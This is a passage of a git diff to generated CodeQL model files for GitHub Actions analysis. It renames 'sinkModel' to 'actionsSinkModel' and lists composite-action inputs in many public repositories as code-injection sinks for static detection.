+++ b/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nymtech/nym", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml b/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml index ab112bb5ec00..01a552361ecf 100644 --- a/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml +++ b/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["obsproject/obs-studio", "*", "input.failCondition", "code-injection", "generated"] - ["obsproject/obs-studio", "*", "input.checkGlob", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml b/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml index 0d8ae4e102e4..ab2e86ce8681 100644 --- a/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml +++ b/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ocaml/dune", "*", "input.OCAML_COMPILER", "code-injection", "generated"] - ["ocaml/dune", "*", "input.DKML_COMPILER", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml b/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml index 44156ddd6709..8d6dd73bfd91 100644 --- a/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml +++ b/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["oneflow-inc/oneflow", "*", "input.extra_flags", "code-injection", "generated"] - ["oneflow-inc/oneflow", "*", "input.python_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml index 693d456e4a59..a20cbb1e24da 100644 --- a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml +++ b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-ruby-contrib", "*", "input.gem", "code-injection", "generated"] - ["open-telemetry/opentelemetry-ruby-contrib", "*", "input.latest", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml index 5e3dffbb7f5e..62785bef86bf 100644 --- a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-ruby", "*", "input.gem", "code-injection", "generated"] - ["open-telemetry/opentelemetry-ruby", "*", "input.ruby", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml b/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml index 5d782529f7f6..9c10a54abc71 100644 --- a/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml +++ b/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["open-watcom/open-watcom-v2", "*", "input.fullname", "code-injection", "generated"] - ["open-watcom/open-watcom-v2", "*", "input.buildcmd", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml b/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml index f7f845ac28f7..4145ec195690 100644 --- a/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml +++ b/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openapitools/openapi-generator", "*", "input.args", "code-injection", "generated"] - ["openapitools/openapi-generator", "*", "input.name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml b/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml index a58f033cc38d..5b63c9fec069 100644 --- a/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openjdk/jdk", "*", "input.debug-suffix", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml b/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml index aefece4bebda..f21389b08b02 100644 --- a/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml +++ b/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["opensearch-project/opensearch-net", "*", "input.version", "code-injection", "generated"] - ["opensearch-project/opensearch-net", "*", "input.build_script", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml b/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml index 5cbcfc018791..1a6f42c25f66 100644 --- a/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml +++ b/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["opensearch-project/security", "*", "input.plugin-branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml b/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml index 0712838a737f..ea48b84310cb 100644 --- a/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml +++ b/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["opentrons/opentrons", "*", "input.destPrefix", "code-injection", "generated"] - ["opentrons/opentrons", "*", "input.domain", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml b/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml index 5ab14ba453bd..4e953d695f82 100644 --- a/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml +++ b/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openvinotoolkit/openvino", "*", "input.skip_when_only_listed_files_changed", "code-injection", "generated"] - ["openvinotoolkit/openvino", "*", "input.skip_when_only_listed_labels_set", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml index 564961fc6007..32040ef84eac 100644 --- a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml +++ b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "input.layout", "code-injection", "generated"] - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "input.out_layout", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml index 8876184a0c1a..b258ea1ce2da 100644 --- a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml +++ b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openzeppelin/openzeppelin-contracts", "*", "input.layout", "code-injection", "generated"] - ["openzeppelin/openzeppelin-contracts", "*", "input.out_layout", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml b/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml index 7a389e89e53c..c0a51345ae6f 100644 --- a/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml +++ b/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["oppia/oppia", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml b/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml index ca23beb6e04d..f362cd1f72b7 100644 --- a/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml +++ b/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["oracle/graal", "*", "input.components", "code-injection", "generated"] - ["oracle/graal", "*", "input.native-images", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml b/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml index 9ddc6606a6dd..35474e6c68f9 100644 --- a/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["oracle/truffleruby", "*", "input.archive", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml b/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml index cd04e9c8b340..ce961ee6a75b 100644 --- a/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml +++ b/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["orhun/git-cliff", "*", "input.command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml b/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml index d986c3312262..9ad4bb306662 100644 --- a/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml +++ b/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["oven-sh/bun", "*", "input.download-url", "code-injection", "generated"] - ["oven-sh/bun", "*", "input.bun-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml b/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml index 9b30c6599c10..5fca46427e00 100644 --- a/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml +++ b/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["owntracks/android", "*", "input.name", "code-injection", "generated"] - ["owntracks/android", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml b/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml index 0089d9ca75d2..9f0fecbe10b9 100644 --- a/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml +++ b/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pandas-dev/pandas", "*", "input.meson_args", "code-injection", "generated"] - ["pandas-dev/pandas", "*", "input.editable", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml b/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml index d64d7c38a013..cadf01dbff1e 100644 --- a/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml +++ b/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pardeike/harmony", "*", "input.architecture", "code-injection", "generated"] - ["pardeike/harmony", "*", "input.build_configuration", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml b/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml index 55a87e2df670..ec4fc1da053c 100644 --- a/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml +++ b/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pennylaneai/pennylane", "*", "input.requirements_file", "code-injection", "generated"] - ["pennylaneai/pennylane", "*", "input.additional_pip_packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml b/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml index 158aafbd1158..e6530a19d972 100644 --- a/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml +++ b/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["phalcon/cphalcon", "*", "input.target-name", "code-injection", "generated"] - ["phalcon/cphalcon", "*", "input.ext-path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml b/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml index ff12a54e97af..0bae4e91cde0 100644 --- a/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml +++ b/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["philosowaffle/peloton-to-garmin", "*", "input.framework", "code-injection", "generated"] - ["philosowaffle/peloton-to-garmin", "*", "input.os", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["philosowaffle/peloton-to-garmin", "*", "input.os", "output.artifact_name", "taint", "manual"] 
diff --git a/ql/lib/ext/generated/composite-actions/php_php-src.model.yml b/ql/lib/ext/generated/composite-actions/php_php-src.model.yml index 1a92afe11a40..0acb53ba1d3a 100644 --- a/ql/lib/ext/generated/composite-actions/php_php-src.model.yml +++ b/ql/lib/ext/generated/composite-actions/php_php-src.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["php/php-src", "*", "input.jitType", "code-injection", "generated"] - ["php/php-src", "*", "input.runTestsParameters", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml b/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml index 38f2399b368e..f1b755e796b5 100644 --- a/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml +++ b/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["phpdocumentor/phpdocumentor", "*", "input.passphrase", "code-injection", "generated"] - ["phpdocumentor/phpdocumentor", "*", "input.secret-key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml b/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml index 36e983b8039b..7d1733d647ac 100644 --- a/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml +++ b/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pinecone-io/pinecone-python-client", "*", "input.googleapis_common_protos_version", "code-injection", "generated"] - ["pinecone-io/pinecone-python-client", "*", "input.protobuf_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml b/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml index 006a53e83761..4bf33c9a343d 100644 --- a/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml +++ b/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pixijs/pixijs", "*", "input.npm-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml b/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml index 5410cb3ff306..9ca004a7c155 100644 --- a/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml +++ b/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["posthog/posthog", "*", "input.group", "code-injection", "generated"] - ["posthog/posthog", "*", "input.concurrency", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/primer_react.model.yml b/ql/lib/ext/generated/composite-actions/primer_react.model.yml index 124b3cf2a5a7..fc3870d89a8e 100644 --- a/ql/lib/ext/generated/composite-actions/primer_react.model.yml +++ b/ql/lib/ext/generated/composite-actions/primer_react.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["primer/react", "*", "input.token", "code-injection", "generated"] - ["primer/react", "*", "input.schedule-id", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml b/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml index 8542583f3d94..1d621562771e 100644 --- a/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml +++ b/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["project-chip/connectedhomeip", "*", "input.with", "code-injection", "generated"] - ["project-chip/connectedhomeip", "*", "input.action", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml b/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml index e85e58fb40a2..f09b364127e6 100644 --- a/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml +++ b/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["projectnessie/nessie", "*", "input.job-name", "code-injection", "generated"] - ["projectnessie/nessie", "*", "input.java-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/psf_black.model.yml b/ql/lib/ext/generated/composite-actions/psf_black.model.yml index d2005f3788a3..56e7b8142316 100644 --- a/ql/lib/ext/generated/composite-actions/psf_black.model.yml +++ b/ql/lib/ext/generated/composite-actions/psf_black.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["psf/black", "*", "input.summary", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml b/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml index 7340dfccdd0d..9f953b32ab17 100644 --- a/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml +++ b/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pyca/cryptography", "*", "input.key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml b/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml index 70022866bdd4..257b77bc2c34 100644 --- a/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml +++ b/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pyg-team/pytorch/geometric", "*", "input.torchvision-version", "code-injection", "generated"] - ["pyg-team/pytorch/geometric", "*", "input.cuda-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml b/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml index f7bd43cbc1e0..49f2f86907f9 100644 --- a/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml +++ b/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["python-poetry/poetry", "*", "input.args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/python_mypy.model.yml b/ql/lib/ext/generated/composite-actions/python_mypy.model.yml index d85a35580b65..1e33c5e540aa 100644 --- a/ql/lib/ext/generated/composite-actions/python_mypy.model.yml +++ b/ql/lib/ext/generated/composite-actions/python_mypy.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["python/mypy", "*", "input.install_project_dependencies", "code-injection", "generated"] - ["python/mypy", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml b/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml index ee0b51c72b43..cfbf15549c48 100644 --- a/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml +++ b/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["quarto-dev/quarto-cli", "*", "input.keychain-pw", "code-injection", "generated"] - ["quarto-dev/quarto-cli", "*", "input.keychain", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/quay_clair.model.yml b/ql/lib/ext/generated/composite-actions/quay_clair.model.yml index 524a1f54ae41..24730af3d77a 100644 --- a/ql/lib/ext/generated/composite-actions/quay_clair.model.yml +++ b/ql/lib/ext/generated/composite-actions/quay_clair.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["quay/clair", "*", "input.tag", "code-injection", "generated"] - ["quay/clair", "*", "input.repo", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml b/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml index 310f11ed1603..6be5abd09dd7 100644 --- a/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml +++ b/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["quickwit-oss/quickwit", "*", "input.target", "code-injection", "generated"] - ["quickwit-oss/quickwit", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml b/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml index 441b824581c4..145b6f0d0e3e 100644 --- a/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["r-lib/actions", "*", "input.lockfile-create-lib", "code-injection", "generated"] - ["r-lib/actions", "*", "input.dependencies", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml b/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml index 19f9f7a03bb8..c8b05bfd904b 100644 --- a/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml +++ b/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["randombit/botan", "*", "input.target", "code-injection", "generated"] - ["randombit/botan", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml b/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml index 1ca71afacc7e..04c218a76c1b 100644 --- a/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml +++ b/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["raspberrypi/documentation", "*", "input.secondary_host", "code-injection", "generated"] - ["raspberrypi/documentation", "*", "input.destination", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml b/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml index 9f0ff2c86de4..5447d4b7e2ed 100644 --- a/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml +++ b/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ray-project/kuberay", "*", "input.ray_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml b/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml index abb6c432aeff..825ce27511d7 100644 --- a/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["readthedocs/actions", "*", "input.single-version", "code-injection", "generated"] - ["readthedocs/actions", "*", "input.platform", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml b/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml index 6548880f59ed..8f3e49c9768a 100644 --- a/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml +++ b/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["reflex-dev/reflex", "*", "input.create-venv-at-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml b/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml index 5401d1760513..1937367debc7 100644 --- a/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml +++ b/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["renovatebot/renovate", "*", "input.node-version", "code-injection", 